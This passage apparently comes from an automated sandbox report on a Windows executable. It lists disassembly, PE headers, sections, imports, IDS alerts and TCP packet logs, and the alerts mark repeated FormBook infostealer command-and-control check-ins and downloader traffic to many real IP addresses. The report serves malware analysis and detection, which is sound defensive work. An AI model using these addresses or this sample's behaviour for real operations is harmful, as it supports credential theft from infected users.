                                                                                                                                                                                                                                                              call dword ptr [0040728Ch]
                                                                                                                                                                                                                                                              push 00000008h
                                                                                                                                                                                                                                                              mov dword ptr [0042E458h], eax
                                                                                                                                                                                                                                                              call 00007F07E0B4D47Ah
                                                                                                                                                                                                                                                              mov dword ptr [0042E3A4h], eax
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                              push 00000160h
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              push 004287E0h
                                                                                                                                                                                                                                                              call dword ptr [00407164h]
                                                                                                                                                                                                                                                              push 00409180h
                                                                                                                                                                                                                                                              push 0042DBA0h
                                                                                                                                                                                                                                                              call 00007F07E0B4D124h
                                                                                                                                                                                                                                                              call dword ptr [00407120h]
                                                                                                                                                                                                                                                              mov ebp, 00434000h
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call 00007F07E0B4D112h
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              call dword ptr [00407118h]
                                                                                                                                                                                                                                                              cmp byte ptr [00434000h], 00000022h
                                                                                                                                                                                                                                                              mov dword ptr [0042E3A0h], eax
                                                                                                                                                                                                                                                              mov eax, ebp
                                                                                                                                                                                                                                                              jne 00007F07E0B4A6ECh
                                                                                                                                                                                                                                                              mov byte ptr [esp+14h], 00000022h
                                                                                                                                                                                                                                                              mov eax, 00434001h
                                                                                                                                                                                                                                                              push dword ptr [esp+14h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call 00007F07E0B4CBA2h
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call dword ptr [00407220h]
                                                                                                                                                                                                                                                              mov dword ptr [esp+1Ch], eax
                                                                                                                                                                                                                                                              jmp 00007F07E0B4A7A5h
                                                                                                                                                                                                                                                              cmp cl, 00000020h
                                                                                                                                                                                                                                                              jne 00007F07E0B4A6E8h
                                                                                                                                                                                                                                                              inc eax
                                                                                                                                                                                                                                                              cmp byte ptr [eax], 00000020h
                                                                                                                                                                                                                                                              je 00007F07E0B4A6DCh

                                                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x450000x637c8.rsrc
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x10b1700x12e8
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                              .text0x10000x5de00x5e00fb829372ec3ee0af33f0926f363d7112False0.6797290558510638data6.509050369718118IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .rdata0x70000x12da0x1400bed60c9116dbff6d06b51530a732c0c9False0.4392578125data5.100506048006475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                              .data0x90000x254980x400fc40238f44ce66a60a99356986da33b0False0.6416015625data5.041552728077907IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .ndata0x2f0000x160000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                              .rsrc0x450000x637c80x63800bed43e5f141364b40c893d7fe299ed10False0.14189600345477388data4.660484545220482IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                              RT_ICON0x453280x4180cDevice independent bitmap graphic, 255 x 510 x 32, image size 260100EnglishUnited States0.12016026835631756
                                                                                                                                                                                                                                                              RT_ICON0x86b380x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.16372885366142198
                                                                                                                                                                                                                                                              RT_ICON0x973600x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.17955118772335504
                                                                                                                                                                                                                                                              RT_ICON0xa08080x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.23187293339631554
                                                                                                                                                                                                                                                              RT_ICON0xa4a300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.25072614107883817
                                                                                                                                                                                                                                                              RT_ICON0xa6fd80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.3610655737704918
                                                                                                                                                                                                                                                              RT_ICON0xa79600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.425531914893617
                                                                                                                                                                                                                                                              RT_DIALOG0xa7dc80x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                              RT_DIALOG0xa7ec80x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                              RT_DIALOG0xa7fe80xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                                                                                              RT_DIALOG0xa80b00x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                              RT_GROUP_ICON0xa81100x68dataEnglishUnited States0.7788461538461539
                                                                                                                                                                                                                                                              RT_VERSION0xa81780x260dataEnglishUnited States0.4901315789473684
                                                                                                                                                                                                                                                              RT_MANIFEST0xa83d80x3eaXML 1.0 document, ASCII text, with very long lines (1002), with no line terminatorsEnglishUnited States0.5169660678642715

                                                                                                                                                                                                                                                              Imports

                                                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                                                              KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                                                                                                                                                                                                                                              USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                                                                                                                                                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                                                                                                                                                              ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                                                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                                                                                                              ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                                                                                                                                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                              2024-10-09T13:34:07.806724+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978813.248.169.4880TCP
                                                                                                                                                                                                                                                              2024-10-09T13:34:55.858437+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049738170.249.236.53443TCP
                                                                                                                                                                                                                                                              2024-10-09T13:35:06.975942+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049739199.103.62.205443TCP
                                                                                                                                                                                                                                                              2024-10-09T13:35:59.115288+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049741103.247.8.5380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:36:02.023125+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049742103.247.8.5380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:36:05.090621+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049743103.247.8.5380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:36:21.517140+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974572.14.178.17480TCP
                                                                                                                                                                                                                                                              2024-10-09T13:36:24.189485+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974672.14.178.17480TCP
                                                                                                                                                                                                                                                              2024-10-09T13:36:26.855030+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974772.14.178.17480TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:07.737257+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049750172.67.191.24180TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:10.357901+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049751172.67.191.24180TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:12.983529+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049752172.67.191.24180TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:21.260233+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049754104.21.50.20280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:23.711248+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049755104.21.50.20280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:26.963312+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049756104.21.50.20280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:34.967350+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049758203.161.46.20580TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:37.670013+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049759203.161.46.20580TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:40.372427+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049760203.161.46.20580TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:49.532896+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976223.227.38.7480TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:52.415426+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976323.227.38.7480TCP
                                                                                                                                                                                                                                                              2024-10-09T13:38:54.690081+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976423.227.38.7480TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:02.904333+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049766154.23.184.20780TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:05.737553+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049767154.23.184.20780TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:08.563169+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049768154.23.184.20780TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:17.017103+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049770185.230.15.380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:19.772466+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049771185.230.15.380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:22.539257+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049772185.230.15.380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:30.524181+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049774199.59.243.22780TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:33.147058+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049775199.59.243.22780TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:35.772200+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049776199.59.243.22780TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:45.672323+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977885.159.66.9380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:48.421733+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977985.159.66.9380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:51.171127+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978085.159.66.9380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:39:58.385647+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049782176.57.64.10280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:40:01.048256+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049783176.57.64.10280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:40:03.694348+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049784176.57.64.10280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:40:11.681721+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978613.248.169.4880TCP
                                                                                                                                                                                                                                                              2024-10-09T13:40:14.315496+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978713.248.169.4880TCP
                                                                                                                                                                                                                                                              2024-10-09T13:40:25.227639+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979082.112.244.9280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:40:27.974207+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979182.112.244.9280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:40:30.707451+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979282.112.244.9280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:40:48.767888+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049795103.247.8.5380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:40:51.583421+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049796103.247.8.5380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:40:54.481457+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049797103.247.8.5380TCP
                                                                                                                                                                                                                                                              2024-10-09T13:41:10.741849+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979972.14.178.17480TCP
                                                                                                                                                                                                                                                              2024-10-09T13:41:13.412850+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980072.14.178.17480TCP
                                                                                                                                                                                                                                                              2024-10-09T13:41:16.085344+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980172.14.178.17480TCP
                                                                                                                                                                                                                                                              2024-10-09T13:42:56.328946+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049803172.67.191.24180TCP
                                                                                                                                                                                                                                                              2024-10-09T13:42:58.958779+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049804172.67.191.24180TCP
                                                                                                                                                                                                                                                              2024-10-09T13:43:01.599397+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049805172.67.191.24180TCP
                                                                                                                                                                                                                                                              2024-10-09T13:43:09.934125+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049807104.21.50.20280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:43:12.194840+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049808104.21.50.20280TCP
                                                                                                                                                                                                                                                              2024-10-09T13:43:15.028948+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049809104.21.50.20280TCP

                                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.310599089 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.310760975 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.311085939 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.341238976 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.341325998 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.595921993 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.596188068 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.634834051 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.634932041 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.636073112 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.636921883 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.638278008 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.680277109 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.858608007 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.858877897 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.858961105 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.859152079 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.974356890 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.974370003 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.974462986 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.974742889 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.974742889 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.974742889 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.974742889 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.974764109 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975012064 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975120068 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975151062 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975323915 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975323915 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975323915 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975323915 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975337982 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975503922 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975503922 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:55.975694895 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.090519905 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.090542078 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.090861082 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.090861082 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.090861082 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.090876102 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091034889 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091053009 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091057062 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091244936 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091248989 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091293097 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091293097 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091379881 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091557980 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091572046 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091579914 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091763973 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091813087 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091813087 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.091814041 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206022978 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206037045 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206217051 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206248045 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206356049 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206404924 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206404924 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206404924 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206404924 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206404924 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206592083 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206592083 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.206765890 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.207858086 CEST49738443192.168.11.20170.249.236.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:34:56.207868099 CEST44349738170.249.236.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.496397018 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.496517897 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.496761084 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.496933937 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.497010946 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.743494987 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.743788958 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.748441935 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.748505116 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.749483109 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.749706984 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.749905109 CEST49739443192.168.11.20199.103.62.205
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.792253971 CEST44349739199.103.62.205192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:35:06.975920916 CEST44349739199.103.62.205192.168.11.20
